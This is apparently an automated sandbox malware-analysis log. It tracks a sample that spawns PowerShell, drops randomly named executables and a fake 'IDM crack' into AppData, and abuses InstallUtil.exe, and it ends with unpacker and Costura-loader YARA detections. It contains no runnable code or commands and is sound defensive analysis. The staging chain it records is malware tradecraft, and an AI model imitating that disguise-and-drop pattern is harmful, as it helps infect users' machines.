Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll

Source: C:\Users\user\Desktop\KMj8h32vWy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: KMj8h32vWy.exe

Static file information: File size 2349056 > 1048576

Source: KMj8h32vWy.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x23c200

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.000000000306F000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1658008989.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000042A3000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.000000000422B000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.000000000306F000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1658008989.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000042A3000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.000000000422B000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 3.2.Hzoynygqzv.exe.3d8d590.7.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 3.2.Hzoynygqzv.exe.3d8d590.7.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 3.2.Hzoynygqzv.exe.3d8d590.7.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 3.2.Hzoynygqzv.exe.3d8d590.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 3.2.Hzoynygqzv.exe.3d8d590.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 3.2.Hzoynygqzv.exe.3ddd5b0.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 3.2.Hzoynygqzv.exe.3ddd5b0.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 3.2.Hzoynygqzv.exe.3ddd5b0.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 3.2.Hzoynygqzv.exe.3ddd5b0.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 3.2.Hzoynygqzv.exe.3ddd5b0.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 10.2.Ouopxupnarf.exe.40039d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.2f65008.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.2f092e4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.2f65008.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.5950000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.2f092e4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1879701013.0000000003FEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
